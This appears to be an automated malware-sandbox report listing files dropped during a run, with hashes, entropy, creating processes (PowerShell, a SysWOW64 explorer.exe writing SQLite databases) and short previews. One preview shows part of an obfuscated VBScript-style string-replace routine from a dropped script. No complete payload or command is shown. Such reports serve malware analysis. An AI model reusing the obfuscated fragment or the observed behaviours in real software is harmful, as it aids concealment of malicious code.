                                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsvJg771I9PYnWpW8VY7Ym8M4JYcFeNyq85M6Eb9Q39d:uIjfRI7IYW7VfJ4Fba39d
                                                                                                                                                                                                                          MD5:5A45A1606A7B3A0920A8FB05A83CB1CF
                                                                                                                                                                                                                          SHA1:5CC1651E1694B1B7DF3ADE16508AE2A0A265E90C
                                                                                                                                                                                                                          SHA-256:4E911D9E7F035B97411E2EDE9AC34CAA9669EA65C6E9DFCCCB43F566B79195EB
                                                                                                                                                                                                                          SHA-512:EB80E633AD964377F6C856C153509AD4055C4557624AFFCF1488C80AF152DE8C1E87D0E409F8BA7BFB5771998132B84ADE1C4460AD25CF5B04DBF9726C6ED2D4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="593800" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\djvbaae
                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                          Size (bytes):311
                                                                                                                                                                                                                          Entropy (8bit):5.347482639021185
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:Q3La/xwchA2DLIP12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hhpDLI4M9tDLI4MWuPTAv
                                                                                                                                                                                                                          MD5:1AC8524D3800CDD5A91A864BCD4C3AB5
                                                                                                                                                                                                                          SHA1:D003AEE44AC954938CE83E4A80412E04F726EA83
                                                                                                                                                                                                                          SHA-256:8652A0399D65C2D111841F66EF2E930CDB8291CC8203252D59FD4921FF336C02
                                                                                                                                                                                                                          SHA-512:9F28B59B99D0BC1EB60D29BE54CE2DAAC7D9B5D895311169578383C19A46CCF7CDE498EB6D7F172CF7D1D11E5B16665DF989CD8EEC527282BE3B796CD08C7DAC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (377), with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):141308
                                                                                                                                                                                                                          Entropy (8bit):3.677460277464518
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:DBkSUTu5S/BV4Mf8mOZG3WVGwB7xW9xjqGuvcQ6T0+gt5pzBGwm:mSU/B2e8muG3WQwNjG4cQ6TZgt5p9Gwm
                                                                                                                                                                                                                          MD5:855D024750A1BC1BC078E60C05E506E3
                                                                                                                                                                                                                          SHA1:480C344EF4E060ADB7CA7E159C815CB38AC87614
                                                                                                                                                                                                                          SHA-256:560327E8E4C818547FE966C8704D97270986B7457D62A154219E81ED4AFB4667
                                                                                                                                                                                                                          SHA-512:64A68DD3C8750E7A90C95078DC1DB87086C546212B56348E6D45F4444B5DD7E6725F3B5DDBC2C414D08A7DF2FBF2EECD11B9AB414588AC7B66F57F70FBB85C94
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:..........F.u.n.c.t.i.o.n. .e.n.g.o.m.a.d.e.l.a.(.B.y.V.a.l. .c.o.r.n.o.f.o.n.e.,. .B.y.V.a.l. .m.o.q.u.e.n.c.o.,. .B.y.V.a.l. .a.p.r.e.s.a.r.)..... . . . .D.i.m. .a.s.s.e.n.t.i.m.e.n.t.o..... . . . .a.s.s.e.n.t.i.m.e.n.t.o. .=. .I.n.S.t.r.(.c.o.r.n.o.f.o.n.e.,. .m.o.q.u.e.n.c.o.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .a.s.s.e.n.t.i.m.e.n.t.o. .>. .0..... . . . . . . . .c.o.r.n.o.f.o.n.e. .=. .L.e.f.t.(.c.o.r.n.o.f.o.n.e.,. .a.s.s.e.n.t.i.m.e.n.t.o. .-. .1.). .&. .a.p.r.e.s.a.r. .&. .M.i.d.(.c.o.r.n.o.f.o.n.e.,. .a.s.s.e.n.t.i.m.e.n.t.o. .+. .L.e.n.(.m.o.q.u.e.n.c.o.).)..... . . . . . . . .a.s.s.e.n.t.i.m.e.n.t.o. .=. .I.n.S.t.r.(.a.s.s.e.n.t.i.m.e.n.t.o. .+. .L.e.n.(.a.p.r.e.s.a.r.).,. .c.o.r.n.o.f.o.n.e.,. .m.o.q.u.e.n.c.o.)..... . . . .L.o.o.p..... . . . ..... . . . .e.n.g.o.m.a.d.e.l.a. .=. .c.o.r.n.o.f.o.n.e.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... .
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):5829
                                                                                                                                                                                                                          Entropy (8bit):4.901113710259376
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                                                                                                                                          MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                                                                                                                                          SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                                                                                                                                          SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                                                                                                                                          SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:@...e...........................................................
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):114688
                                                                                                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Nov 18 19:36:57 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1328
                                                                                                                                                                                                                          Entropy (8bit):3.9934165075174137
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:HSe9E2+fnsm+8XDfH+wKEbsmfII+ycuZhNsakSoPNnqSqd:gg8z9KPmg1ulsa3QqSK
                                                                                                                                                                                                                          MD5:AB07F495CFBB9FE5FE0B527E29F7E29B
                                                                                                                                                                                                                          SHA1:00E0D8D8570343BD749B4FA5CCD51C96BF03B428
                                                                                                                                                                                                                          SHA-256:2103C3B050EB6AD85E885A690B6B69BF2C9C11885A63A822D51FCAE2DED8EF26
                                                                                                                                                                                                                          SHA-512:FCADCAF504760E8BFC50F30ADB9F9E29378BF728DD8CE290B6F189D6457B9A284D9120B6730536C812B5AB3A7DACE6CC30E53B5E9173B2C1894B07269F83E43F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:L...Y.;g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\tnaq44gy\CSCA55E465C63A145CC9DC9276A53775DB5.TMP................vT..g...**S..............4.......C:\Users\user\AppData\Local\Temp\RES60DC.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.n.a.q.4.4.g.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                          Malicious:false
